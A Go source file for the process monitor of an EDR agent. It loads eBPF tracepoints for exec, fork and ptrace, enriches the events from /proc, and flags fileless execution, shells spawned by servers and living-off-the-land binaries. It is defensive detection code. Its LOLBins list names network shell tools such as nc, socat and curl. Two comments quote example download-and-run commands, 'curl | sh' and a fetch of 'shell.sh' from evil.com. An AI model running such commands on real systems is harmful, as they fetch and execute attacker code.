// internal/monitor/process/monitor.go
//
// Process monitor — userspace side.
// Loads the compiled eBPF object, attaches probes, reads events from
// the ring buffer, enriches them from /proc, and emits typed events
// to the central event bus.

package process

import (
	"bytes"
	"context"
	"encoding/binary"
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
	"sync"
	"time"
	"unicode"

	"github.com/cilium/ebpf"
	"github.com/cilium/ebpf/link"
	"github.com/cilium/ebpf/ringbuf"
	"github.com/cilium/ebpf/rlimit"
	"github.com/rs/zerolog"

	"github.com/youredr/edr-agent/internal/container"
	"github.com/youredr/edr-agent/internal/events"
	"github.com/youredr/edr-agent/pkg/types"
	"github.com/youredr/edr-agent/pkg/utils"
)

// ─── eBPF event types (must match process.bpf.c) ─────────────────────────────

const (
	ebpfEventExec   = 1
	ebpfEventExit   = 2
	ebpfEventFork   = 3
	ebpfEventPtrace = 4
)

// ─── Raw kernel structs (little-endian, matches C layout) ────────────────────
// These mirror the C structs in process.bpf.c exactly.

const (
	taskCommLen = 16
	pathMax     = 256
	argsMax     = 512
)

type rawExecEvent struct {
	TimestampNs uint64
	EventType   uint32
	PID         uint32
	PPID        uint32
	TID         uint32
	UID         uint32
	GID         uint32
	EUID        uint32
	EGID        uint32
	Comm        [taskCommLen]byte
	Filename    [pathMax]byte
	Args        [argsMax]byte
	ArgsLen     uint32
	IsMemFD     uint32
	Flags       uint32
}

type rawExitEvent struct {
	TimestampNs uint64
	EventType   uint32
	PID         uint32
	PPID        uint32
	TID         uint32
	UID         uint32
	GID         uint32
	Comm        [taskCommLen]byte
	ExitCode    uint32
	Flags       uint32
}

type rawForkEvent struct {
	TimestampNs uint64
	EventType   uint32
	ParentPID   uint32
	ParentPPID  uint32
	ParentTID   uint32
	ChildPID    uint32
	ChildTID    uint32
	UID         uint32
	GID         uint32
	ParentComm  [taskCommLen]byte
	CloneFlags  uint64
}

type rawPtraceEvent struct {
	TimestampNs    uint64
	EventType      uint32
	TracerPID      uint32
	TracerPPID     uint32
	TracerUID      uint32
	TracerComm     [taskCommLen]byte
	TargetPID      uint32
	TargetComm     [taskCommLen]byte
	PtraceRequest  uint32
	Flags          uint32
}

// bpfObjects is the bpf2go-generated ProcessBPFObjects struct.
// Defined in processbpf_bpfel.go (generated by `go generate`).
type bpfObjects = ProcessObjects

// loadBPFObjects loads eBPF programs and maps.
// Tries the bpf2go-generated loader first; falls back to spec-based load.
func loadBPFObjects(obj *bpfObjects, opts *ebpf.CollectionOptions) error {
	return LoadProcessObjects(obj, opts)
}

// ─── Monitor ──────────────────────────────────────────────────────────────────

// Config controls the process monitor behavior.
type Config struct {
	// BPFObjectPath is the path to the compiled process.bpf.o file.
	// If empty, uses the embedded bytes compiled in via go:embed.
	BPFObjectPath string

	// MaxAncestryDepth limits how many parent processes we walk.
	MaxAncestryDepth int

	// CaptureEnv: capture environment variables for suspicious processes.
	CaptureEnv bool

	// SuspiciousParents: if a process is spawned by one of these, flag it.
	// e.g. ["httpd", "nginx", "apache2", "sshd", "crond"]
	SuspiciousParents []string

	// LOLBins: living-off-the-land binaries to flag.
	LOLBins []string
}

func DefaultConfig() Config {
	return Config{
		MaxAncestryDepth: 5,
		CaptureEnv:       false,
		SuspiciousParents: []string{
			"httpd", "nginx", "apache2", "lighttpd",
			"sshd", "vsftpd", "mysqld", "postgres",
			"java", "python", "python3", "ruby", "php",
			"node", "npm", "crond", "atd",
		},
		LOLBins: []string{
			"bash", "sh", "zsh", "ksh", "dash",
			"python", "python3", "perl", "ruby", "php",
			"curl", "wget", "nc", "netcat", "ncat",
			"socat", "nmap", "tcpdump", "strace",
			"dd", "base64", "xxd", "od",
			"crontab", "at", "systemctl",
			"iptables", "ip6tables", "ufw",
			"chmod", "chown", "chattr",
			"insmod", "rmmod", "modprobe",
			"mount", "umount",
			"ptrace", "gdb", "lldb", "strace",
		},
	}
}

// Monitor is the process monitoring component.
type Monitor struct {
	cfg    Config
	bus    events.Bus
	logger zerolog.Logger

	// eBPF state
	objs   bpfObjects
	links  []link.Link
	reader *ringbuf.Reader

	// Process tree cache: pid → ProcessContext
	// Used to resolve ancestry without hitting /proc (which may be gone by then).
	treeMu sync.RWMutex
	tree   map[uint32]*types.ProcessContext

	// Start times for computing exit duration: pid → start ns (monotonic boot time)
	startNs map[uint32]uint64

	// Wall-clock start times for exit duration when boot-time unavailable
	startWall map[uint32]time.Time

	stopCh chan struct{}
	wg     sync.WaitGroup
}

// New creates a new process Monitor. Call Start() to begin monitoring.
func New(cfg Config, bus events.Bus, logger zerolog.Logger) *Monitor {
	return &Monitor{
		cfg:       cfg,
		bus:       bus,
		logger:    logger.With().Str("monitor", "process").Logger(),
		tree:      make(map[uint32]*types.ProcessContext),
		startNs:   make(map[uint32]uint64),
		startWall: make(map[uint32]time.Time),
		stopCh:    make(chan struct{}),
	}
}

// Start loads the eBPF programs and begins reading events.
func (m *Monitor) Start(ctx context.Context) error {
	// Remove memlock rlimit restriction (required for eBPF map creation).
	if err := rlimit.RemoveMemlock(); err != nil {
		return fmt.Errorf("remove memlock: %w", err)
	}

	// Load eBPF programs and maps into the kernel using bpf2go-generated loader.
	if err := loadBPFObjects(&m.objs, nil); err != nil {
		return fmt.Errorf("load and assign bpf objects: %w", err)
	}

	// Attach tracepoints.
	if err := m.attachProbes(); err != nil {
		m.closeObjs()
		return fmt.Errorf("attach probes: %w", err)
	}

	// Open ring buffer reader.
	var errRB error
	m.reader, errRB = ringbuf.NewReader(m.objs.ProcessEvents)
	if errRB != nil {
		m.closeObjs()
		return fmt.Errorf("open ring buffer: %w", errRB)
	}

	m.logger.Info().Msg("process monitor started")

	// Build initial process tree snapshot from /proc.
	m.snapshotProcFS()

	// Start event reader goroutine.
	m.wg.Add(1)
	go m.readLoop(ctx)

	// Start process exit watcher — polls /proc to detect exited processes.
	// The eBPF sched_process_exit tracepoint was removed due to verifier
	// issues; this goroutine synthesizes PROCESS_EXIT events instead.
	m.wg.Add(1)
	go m.procExitWatcher(ctx)

	return nil
}

// Stop gracefully shuts down the monitor.
func (m *Monitor) Stop() {
	close(m.stopCh)
	if m.reader != nil {
		m.reader.Close()
	}
	m.wg.Wait()
	m.closeObjs()
	m.logger.Info().Msg("process monitor stopped")
}

// ─── eBPF loading ─────────────────────────────────────────────────────────────


func (m *Monitor) attachProbes() error {
	// sys_enter_execve
	l, err := link.Tracepoint("syscalls", "sys_enter_execve",
		m.objs.TracepointSyscallsSysEnterExecve, nil)
	if err != nil {
		return fmt.Errorf("attach execve tracepoint: %w", err)
	}
	m.links = append(m.links, l)

	// sched_process_exit removed — eBPF program removed (verifier issue on this kernel)
	// Exit events are synthesized by the procWatcher goroutine below.

	// sched_process_fork
	l, err = link.Tracepoint("sched", "sched_process_fork",
		m.objs.TracepointSchedSchedProcessFork, nil)
	if err != nil {
		return fmt.Errorf("attach fork tracepoint: %w", err)
	}
	m.links = append(m.links, l)

	// sys_enter_ptrace
	l, err = link.Tracepoint("syscalls", "sys_enter_ptrace",
		m.objs.TracepointSyscallsSysEnterPtrace, nil)
	if err != nil {
		return fmt.Errorf("attach ptrace tracepoint: %w", err)
	}
	m.links = append(m.links, l)

	// kprobe/kernel_clone for clone flags
	l, err = link.Kprobe("kernel_clone", m.objs.KprobeKernelClone, nil)
	if err != nil {
		// kernel_clone may not exist on older kernels (pre-5.10); non-fatal.
		m.logger.Warn().Err(err).Msg("kernel_clone kprobe unavailable, fork clone flags will be 0")
	} else {
		m.links = append(m.links, l)
	}

	return nil
}

func (m *Monitor) closeObjs() {
	for _, l := range m.links {
		l.Close()
	}
	m.objs.Close()
}

// ─── Ring buffer read loop ────────────────────────────────────────────────────

func (m *Monitor) readLoop(ctx context.Context) {
	defer m.wg.Done()

	for {
		select {
		case <-m.stopCh:
			return
		case <-ctx.Done():
			return
		default:
		}

		record, err := m.reader.Read()
		if err != nil {
			if strings.Contains(err.Error(), "closed") {
				return
			}
			m.logger.Error().Err(err).Msg("ring buffer read error")
			continue
		}

		if err := m.dispatchEvent(record.RawSample); err != nil {
			m.logger.Error().Err(err).Msg("dispatch event failed")
		}
	}
}

func (m *Monitor) dispatchEvent(raw []byte) error {
	if len(raw) < 8 {
		return fmt.Errorf("event too short: %d bytes", len(raw))
	}

	// First 8 bytes = timestamp_ns (uint64), next 4 = event_type (uint32).
	var header struct {
		TimestampNs uint64
		EventType   uint32
	}
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &header); err != nil {
		return fmt.Errorf("read header: %w", err)
	}

	switch header.EventType {
	case ebpfEventExec:
		return m.handleExecEvent(raw)
	case ebpfEventExit:
		return m.handleExitEvent(raw)
	case ebpfEventFork:
		return m.handleForkEvent(raw)
	case ebpfEventPtrace:
		return m.handlePtraceEvent(raw)
	default:
		return fmt.Errorf("unknown event type: %d", header.EventType)
	}
}

// ─── Event handlers ───────────────────────────────────────────────────────────

func (m *Monitor) handleExecEvent(raw []byte) error {
	var r rawExecEvent
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &r); err != nil {
		return fmt.Errorf("decode exec event: %w", err)
	}

	ts := bootTimeToWallClock(r.TimestampNs)

	proc := m.buildProcessContext(r.PID, r.PPID, r.TID, r.UID, r.GID, r.EUID,
		nullStr(r.Comm[:]), nullStr(r.Filename[:]),
		parseArgs(r.Args[:], r.ArgsLen), ts)

	parent := m.lookupOrProcFS(r.PPID)

	// Compute exe hash (may fail if process already exited — that's fine).
	exeHash, exeSize := utils.HashExe(fmt.Sprintf("/proc/%d/exe", r.PID))

	// Detect fileless execution via memfd.
	isMemFD := r.IsMemFD != 0 || strings.HasPrefix(proc.ExePath, "/memfd:")

	// Detect interpreter-based execution (python, perl, bash -c, etc.).
	interpreter, scriptPath := detectInterpreter(proc)

	// Build ancestry chain.
	ancestry := m.buildAncestry(r.PPID, m.cfg.MaxAncestryDepth)

	// Update process tree cache.
	m.treeMu.Lock()
	m.tree[r.PID] = &proc
	m.startNs[r.PID] = r.TimestampNs
	m.startWall[r.PID] = ts
	m.treeMu.Unlock()

	ev := &types.ProcessExecEvent{
		BaseEvent: types.BaseEvent{
			ID:        utils.NewEventID(),
			Type:      types.EventProcessExec,
			Timestamp: ts,
			AgentID:   m.bus.AgentID(),
			Hostname:  m.bus.Hostname(),
			Severity:  m.assessExecSeverity(proc, parent, isMemFD),
			Process:   proc,
			Tags:      m.tagExecEvent(proc, parent, isMemFD),
		},
		ParentProcess: parent,
		ExeHash:       exeHash,
		ExeSize:       exeSize,
		IsMemFD:       isMemFD,
		Interpreter:   interpreter,
		ScriptPath:    scriptPath,
		Ancestry:      ancestry,
	}

	// Network enrichment: scan open sockets and parse cmdline for network targets.
	// Both are best-effort — failures are silently ignored.
	ev.OpenSockets    = enrichOpenSockets(r.PID)
	ev.NetworkTargets = enrichNetworkTargets(proc)

	m.bus.Publish(ev)
	m.logExecEvent(ev)
	return nil
}

func (m *Monitor) handleExitEvent(raw []byte) error {
	var r rawExitEvent
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &r); err != nil {
		return fmt.Errorf("decode exit event: %w", err)
	}

	ts := bootTimeToWallClock(r.TimestampNs)

	m.treeMu.Lock()
	proc, ok := m.tree[r.PID]
	startNs := m.startNs[r.PID]
	delete(m.tree, r.PID)
	delete(m.startNs, r.PID)
	delete(m.startWall, r.PID)
	m.treeMu.Unlock()

	var procCtx types.ProcessContext
	if ok && proc != nil {
		procCtx = *proc
	} else {
		procCtx = types.ProcessContext{
			PID:  r.PID,
			PPID: r.PPID,
			Comm: nullStr(r.Comm[:]),
			UID:  r.UID,
			GID:  r.GID,
		}
	}

	exitStatus := (r.ExitCode >> 8) & 0xff
	exitSignal := r.ExitCode & 0x7f

	var duration time.Duration
	if startNs > 0 && r.TimestampNs > startNs {
		duration = time.Duration(r.TimestampNs - startNs)
	}

	ev := &types.ProcessExitEvent{
		BaseEvent: types.BaseEvent{
			ID:        utils.NewEventID(),
			Type:      types.EventProcessExit,
			Timestamp: ts,
			AgentID:   m.bus.AgentID(),
			Hostname:  m.bus.Hostname(),
			Severity:  types.SeverityInfo,
			Process:   procCtx,
		},
		ExitCode: int32(exitStatus),
		Signal:   exitSignal,
		Duration: duration,
	}

	m.bus.Publish(ev)
	return nil
}

func (m *Monitor) handleForkEvent(raw []byte) error {
	var r rawForkEvent
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &r); err != nil {
		return fmt.Errorf("decode fork event: %w", err)
	}

	ts := bootTimeToWallClock(r.TimestampNs)

	// Is this a thread (CLONE_THREAD=0x10000) or a new process?
	isThread := r.CloneFlags&0x10000 != 0
	if isThread {
		// We don't emit events for thread creation by default — too noisy.
		return nil
	}

	parent := m.lookupOrProcFS(r.ParentPID)

	ev := &types.ProcessForkEvent{
		BaseEvent: types.BaseEvent{
			ID:        utils.NewEventID(),
			Type:      types.EventProcessFork,
			Timestamp: ts,
			AgentID:   m.bus.AgentID(),
			Hostname:  m.bus.Hostname(),
			Severity:  types.SeverityInfo,
			Process:   parent,
		},
		ChildPID:   r.ChildPID,
		ChildTID:   r.ChildTID,
		CloneFlags: r.CloneFlags,
		IsThread:   isThread,
	}

	// Flag unshare of namespaces as suspicious (container escape / isolation bypass).
	const cloneNewNS   = 0x00020000
	const cloneNewUser = 0x10000000
	const cloneNewNet  = 0x40000000
	if r.CloneFlags&(cloneNewNS|cloneNewUser|cloneNewNet) != 0 {
		ev.Severity = types.SeverityMedium
		ev.Tags = append(ev.Tags, "namespace_unshare")
	}

	m.bus.Publish(ev)
	return nil
}

func (m *Monitor) handlePtraceEvent(raw []byte) error {
	var r rawPtraceEvent
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &r); err != nil {
		return fmt.Errorf("decode ptrace event: %w", err)
	}

	ts := bootTimeToWallClock(r.TimestampNs)
	tracer := m.lookupOrProcFS(r.TracerPID)
	if tracer.Comm == "" {
		tracer.Comm = nullStr(r.TracerComm[:])
	}

	targetComm := nullStr(r.TargetComm[:])
	if targetComm == "" {
		if t := m.lookupOrProcFS(r.TargetPID); t.Comm != "" {
			targetComm = t.Comm
		}
	}

	sev := types.SeverityMedium
	// PTRACE_ATTACH or PTRACE_SEIZE from a non-root, non-debugger process = High.
	if r.TracerUID != 0 && (r.PtraceRequest == 16 || r.PtraceRequest == 0x4206) {
		sev = types.SeverityHigh
	}

	ev := &types.ProcessPtraceEvent{
		BaseEvent: types.BaseEvent{
			ID:        utils.NewEventID(),
			Type:      types.EventProcessPtrace,
			Timestamp: ts,
			AgentID:   m.bus.AgentID(),
			Hostname:  m.bus.Hostname(),
			Severity:  sev,
			Process:   tracer,
			Tags:      []string{"ptrace", ptraceRequestName(r.PtraceRequest)},
		},
		TargetPID:     r.TargetPID,
		TargetComm:    targetComm,
		PtraceRequest: r.PtraceRequest,
	}

	m.bus.Publish(ev)
	return nil
}

// ─── Process enrichment from /proc ───────────────────────────────────────────

// buildProcessContext creates a ProcessContext from kernel event fields +
// enrichment from /proc/<pid>/ directory.
func (m *Monitor) buildProcessContext(
	pid, ppid, tid, uid, gid, euid uint32,
	comm, filename string, args []string, ts time.Time,
) types.ProcessContext {
	ctx := types.ProcessContext{
		PID:       pid,
		PPID:      ppid,
		TID:       tid,
		UID:       uid,
		GID:       gid,
		EUID:      euid,
		Comm:      comm,
		Args:      args,
		StartTime: ts,
	}

	base := fmt.Sprintf("/proc/%d", pid)

	// /proc/<pid>/exe → resolved binary path.
	if exe, err := os.Readlink(filepath.Join(base, "exe")); err == nil {
		ctx.ExePath = exe
	} else {
		ctx.ExePath = filename // fallback to execve filename arg
	}

	// /proc/<pid>/cmdline → full command line (null-separated).
	if raw, err := os.ReadFile(filepath.Join(base, "cmdline")); err == nil {
		ctx.Cmdline = strings.Join(
			strings.Split(strings.TrimRight(string(raw), "\x00"), "\x00"),
			" ")
	}

	// /proc/<pid>/cwd → working directory.
	if cwd, err := os.Readlink(filepath.Join(base, "cwd")); err == nil {
		ctx.Cwd = cwd
	}

	// Username from UID (simple lookup).
	ctx.Username = utils.UIDToUsername(uid)

	// Container / Kubernetes detection from cgroup paths.
	if cinfo := container.Detect(pid); cinfo != nil {
		ctx.ContainerID = cinfo.ContainerID
		ctx.Runtime = cinfo.Runtime
		ctx.ImageName = cinfo.ImageName
		ctx.PodName = cinfo.PodName
		ctx.Namespace = cinfo.Namespace
	}

	return ctx
}

// lookupOrProcFS returns cached ProcessContext or builds a minimal one from /proc.
func (m *Monitor) lookupOrProcFS(pid uint32) types.ProcessContext {
	m.treeMu.RLock()
	cached, ok := m.tree[pid]
	m.treeMu.RUnlock()
	if ok && cached != nil {
		return *cached
	}
	return m.buildProcessContextFromProc(pid)
}

func (m *Monitor) buildProcessContextFromProc(pid uint32) types.ProcessContext {
	ctx := types.ProcessContext{PID: pid}
	base := fmt.Sprintf("/proc/%d", pid)

	if exe, err := os.Readlink(filepath.Join(base, "exe")); err == nil {
		ctx.ExePath = exe
	}
	if raw, err := os.ReadFile(filepath.Join(base, "cmdline")); err == nil {
		parts := strings.Split(strings.TrimRight(string(raw), "\x00"), "\x00")
		if len(parts) > 0 {
			ctx.Comm = filepath.Base(parts[0])
		}
		ctx.Cmdline = strings.Join(parts, " ")
		ctx.Args = parts
	}
	if cwd, err := os.Readlink(filepath.Join(base, "cwd")); err == nil {
		ctx.Cwd = cwd
	}
	if stat, err := os.ReadFile(filepath.Join(base, "status")); err == nil {
		for _, line := range strings.Split(string(stat), "\n") {
			kv := strings.SplitN(line, ":\t", 2)
			if len(kv) != 2 {
				continue
			}
			v := strings.TrimSpace(kv[1])
			switch kv[0] {
			case "Pid":
				if n, err := strconv.ParseUint(v, 10, 32); err == nil {
					ctx.PID = uint32(n)
				}
			case "PPid":
				if n, err := strconv.ParseUint(v, 10, 32); err == nil {
					ctx.PPID = uint32(n)
				}
			case "Uid":
				fields := strings.Fields(v)
				if len(fields) >= 2 {
					if n, err := strconv.ParseUint(fields[0], 10, 32); err == nil {
						ctx.UID = uint32(n)
					}
					if n, err := strconv.ParseUint(fields[1], 10, 32); err == nil {
						ctx.EUID = uint32(n)
					}
				}
			case "Gid":
				fields := strings.Fields(v)
				if len(fields) >= 1 {
					if n, err := strconv.ParseUint(fields[0], 10, 32); err == nil {
						ctx.GID = uint32(n)
					}
				}
			}
		}
	}
	ctx.Username = utils.UIDToUsername(ctx.UID)
	if cinfo := container.Detect(pid); cinfo != nil {
		ctx.ContainerID = cinfo.ContainerID
		ctx.Runtime = cinfo.Runtime
		ctx.ImageName = cinfo.ImageName
		ctx.PodName = cinfo.PodName
		ctx.Namespace = cinfo.Namespace
	}
	return ctx
}

// buildAncestry walks the process tree upward from pid for maxDepth levels.
func (m *Monitor) buildAncestry(ppid uint32, maxDepth int) []types.ProcessContext {
	var ancestry []types.ProcessContext
	seen := make(map[uint32]bool)
	current := ppid

	for i := 0; i < maxDepth && current > 1; i++ {
		if seen[current] {
			break
		}
		seen[current] = true
		proc := m.lookupOrProcFS(current)
		ancestry = append(ancestry, proc)
		current = proc.PPID
	}
	return ancestry
}

// snapshotProcFS reads /proc at startup to pre-populate the process tree cache.
func (m *Monitor) snapshotProcFS() {
	entries, err := os.ReadDir("/proc")
	if err != nil {
		m.logger.Warn().Err(err).Msg("could not read /proc for initial snapshot")
		return
	}

	count := 0
	for _, entry := range entries {
		name := entry.Name()
		if !entry.IsDir() {
			continue
		}
		pid, err := strconv.ParseUint(name, 10, 32)
		if err != nil {
			continue
		}
		p := uint32(pid)
		proc := m.buildProcessContextFromProc(p)
		m.treeMu.Lock()
		m.tree[p] = &proc
		if !proc.StartTime.IsZero() {
			m.startWall[p] = proc.StartTime
		} else {
			m.startWall[p] = time.Now()
		}
		m.treeMu.Unlock()
		count++
	}
	m.logger.Info().Int("processes", count).Msg("process tree snapshot complete")
}

// ─── Process exit watcher ─────────────────────────────────────────────────────
// Polls /proc every 2 seconds to detect processes that have exited.
// For each tracked PID whose /proc/<pid> directory has disappeared, synthesizes
// a PROCESS_EXIT event using the cached ProcessContext and start time.

func (m *Monitor) procExitWatcher(ctx context.Context) {
	defer m.wg.Done()

	ticker := time.NewTicker(2 * time.Second)
	defer ticker.Stop()

	for {
		select {
		case <-m.stopCh:
			return
		case <-ctx.Done():
			return
		case <-ticker.C:
			m.checkForExitedProcesses()
		}
	}
}

func (m *Monitor) checkForExitedProcesses() {
	now := time.Now()

	// Snapshot tracked PIDs under read lock.
	m.treeMu.RLock()
	pids := make([]uint32, 0, len(m.tree))
	for pid := range m.tree {
		pids = append(pids, pid)
	}
	m.treeMu.RUnlock()

	for _, pid := range pids {
		// Check if /proc/<pid> still exists.
		statPath := fmt.Sprintf("/proc/%d/stat", pid)
		if _, err := os.Stat(statPath); err == nil {
			continue // still alive
		}

		// Process has exited — grab cached context and clean up.
		m.treeMu.Lock()
		proc, ok := m.tree[pid]
		wall := m.startWall[pid]
		delete(m.tree, pid)
		delete(m.startNs, pid)
		delete(m.startWall, pid)
		m.treeMu.Unlock()

		if !ok || proc == nil {
			continue
		}

		var duration time.Duration
		if !wall.IsZero() {
			duration = now.Sub(wall)
		}

		// Assess severity: short-lived processes from suspicious parents are interesting.
		sev := types.SeverityInfo
		var tags []string
		if duration > 0 && duration < 2*time.Second {
			tags = append(tags, "short_lived")
		}
		// Processes killed by signal (we can't know the signal from polling,
		// but we tag it as polled_exit for forensic context).
		tags = append(tags, "polled_exit")

		ev := &types.ProcessExitEvent{
			BaseEvent: types.BaseEvent{
				ID:        utils.NewEventID(),
				Type:      types.EventProcessExit,
				Timestamp: now,
				AgentID:   m.bus.AgentID(),
				Hostname:  m.bus.Hostname(),
				Severity:  sev,
				Process:   *proc,
				Tags:      tags,
			},
			ExitCode: -1, // unknown — process already gone
			Duration: duration,
		}

		m.bus.Publish(ev)

		m.logger.Debug().
			Uint32("pid", pid).
			Str("comm", proc.Comm).
			Str("exe", proc.ExePath).
			Dur("duration", duration).
			Msg("PROCESS_EXIT (polled)")
	}
}

// ─── Severity + tagging ───────────────────────────────────────────────────────

func (m *Monitor) assessExecSeverity(
	proc types.ProcessContext,
	parent types.ProcessContext,
	isMemFD bool,
) types.Severity {
	// Fileless execution = Critical.
	if isMemFD {
		return types.SeverityCritical
	}

	// Privilege escalation: EUID=0 but UID != 0.
	if proc.EUID == 0 && proc.UID != 0 {
		return types.SeverityHigh
	}

	// Shell spawned from a server process.
	parentName := filepath.Base(parent.ExePath)
	procName := filepath.Base(proc.ExePath)
	if m.isSuspiciousParent(parentName) && m.isShell(procName) {
		return types.SeverityHigh
	}

	// LOLBin execution by a non-interactive process.
	if m.isLOLBin(procName) && proc.UID != 0 {
		return types.SeverityMedium
	}

	return types.SeverityInfo
}

func (m *Monitor) tagExecEvent(
	proc types.ProcessContext,
	parent types.ProcessContext,
	isMemFD bool,
) []string {
	var tags []string
	if isMemFD {
		tags = append(tags, "fileless", "memfd")
	}
	if proc.EUID == 0 && proc.UID != 0 {
		tags = append(tags, "setuid_escalation")
	}
	if m.isSuspiciousParent(filepath.Base(parent.ExePath)) {
		tags = append(tags, "suspicious_parent")
	}
	if m.isLOLBin(filepath.Base(proc.ExePath)) {
		tags = append(tags, "lolbin")
	}
	if m.isShell(filepath.Base(proc.ExePath)) {
		tags = append(tags, "shell_spawn")
	}
	return tags
}

func (m *Monitor) isSuspiciousParent(name string) bool {
	for _, sp := range m.cfg.SuspiciousParents {
		if strings.EqualFold(name, sp) || strings.HasPrefix(name, sp) {
			return true
		}
	}
	return false
}

func (m *Monitor) isLOLBin(name string) bool {
	for _, lb := range m.cfg.LOLBins {
		if name == lb {
			return true
		}
	}
	return false
}

func (m *Monitor) isShell(name string) bool {
	shells := []string{"sh", "bash", "zsh", "ksh", "dash", "fish", "tcsh", "csh"}
	for _, s := range shells {
		if name == s {
			return true
		}
	}
	return false
}

// ─── Helpers ──────────────────────────────────────────────────────────────────

func (m *Monitor) logExecEvent(ev *types.ProcessExecEvent) {
	log := m.logger.Info()
	if ev.Severity >= types.SeverityHigh {
		log = m.logger.Warn()
	}
	log.
		Str("event_id", ev.ID).
		Str("severity", ev.Severity.String()).
		Uint32("pid", ev.Process.PID).
		Uint32("ppid", ev.Process.PPID).
		Str("exe", ev.Process.ExePath).
		Str("cmdline", ev.Process.Cmdline).
		Str("user", ev.Process.Username).
		Strs("tags", ev.Tags).
		Msg("PROCESS_EXEC")
}

// nullStr converts a null-terminated C byte slice to a Go string.
func nullStr(b []byte) string {
	for i, c := range b {
		if c == 0 {
			return string(b[:i])
		}
	}
	return string(b)
}

// parseArgs converts NUL-separated args buffer into a []string.
func parseArgs(buf []byte, length uint32) []string {
	if length == 0 {
		return nil
	}
	if int(length) > len(buf) {
		length = uint32(len(buf))
	}
	raw := buf[:length]
	parts := bytes.Split(bytes.TrimRight(raw, "\x00"), []byte{0})
	result := make([]string, 0, len(parts))
	for _, p := range parts {
		// Filter non-printable junk.
		s := strings.Map(func(r rune) rune {
			if unicode.IsPrint(r) {
				return r
			}
			return -1
		}, string(p))
		if s != "" {
			result = append(result, s)
		}
	}
	return result
}

// bootTimeToWallClock converts a kernel ktime_get_ns() timestamp to wall clock time.
// ktime_get_ns() is monotonic from boot; we add it to the system boot time.
func bootTimeToWallClock(ns uint64) time.Time {
	return utils.BootNsToTime(ns)
}

// detectInterpreter returns the interpreter name and script path for
// processes like "python3 /tmp/exploit.py" or "bash -c 'curl | sh'".
func detectInterpreter(proc types.ProcessContext) (string, string) {
	name := filepath.Base(proc.ExePath)
	interpreters := map[string]bool{
		"python": true, "python2": true, "python3": true,
		"perl": true, "ruby": true, "php": true, "lua": true,
		"bash": true, "sh": true, "zsh": true, "ksh": true, "dash": true,
		"node": true, "nodejs": true, "deno": true,
	}
	if !interpreters[name] {
		return "", ""
	}
	// Find first non-flag argument as the script path.
	if len(proc.Args) < 2 {
		return name, ""
	}
	for _, arg := range proc.Args[1:] {
		if !strings.HasPrefix(arg, "-") {
			return name, arg
		}
	}
	return name, ""
}

func ptraceRequestName(req uint32) string {
	names := map[uint32]string{
		4: "PTRACE_POKETEXT", 5: "PTRACE_POKEDATA",
		13: "PTRACE_SETREGS", 15: "PTRACE_SETFPREGS",
		16: "PTRACE_ATTACH", 17: "PTRACE_DETACH",
		0x4206: "PTRACE_SEIZE",
	}
	if name, ok := names[req]; ok {
		return name
	}
	return fmt.Sprintf("PTRACE_0x%x", req)
}

// ─── Exec-time network enrichment ────────────────────────────────────────────

// enrichOpenSockets returns a snapshot of all sockets the process has open
// at the moment the exec event fires.  Timing is inherently racy (the process
// may not have connected yet) but catches inherited or fast-connecting tools.
func enrichOpenSockets(pid uint32) []types.SocketInfo {
	entries := utils.PidOpenSockets(pid)
	if len(entries) == 0 {
		return nil
	}
	out := make([]types.SocketInfo, 0, len(entries))
	for _, e := range entries {
		// Skip pure LISTEN sockets (remote = 0.0.0.0:0)
		if e.DstIP == "0.0.0.0" || e.DstPort == 0 {
			continue
		}
		out = append(out, types.SocketInfo{
			SrcIP:    e.SrcIP,
			SrcPort:  e.SrcPort,
			DstIP:    e.DstIP,
			DstPort:  e.DstPort,
			Protocol: e.Proto,
			State:    e.State,
		})
	}
	return out
}

// enrichNetworkTargets extracts URL / hostname / IP targets from the process
// command line (e.g. "curl https://evil.com/shell.sh" → host=evil.com).
func enrichNetworkTargets(proc types.ProcessContext) []types.NetworkTarget {
	raw := utils.ParseNetworkTargets(proc.Comm, proc.Args)
	if len(raw) == 0 {
		return nil
	}
	out := make([]types.NetworkTarget, 0, len(raw))
	for _, r := range raw {
		out = append(out, types.NetworkTarget{
			Raw:    r.Raw,
			Host:   r.Host,
			Port:   r.Port,
			Scheme: r.Scheme,
		})
	}
	return out
}
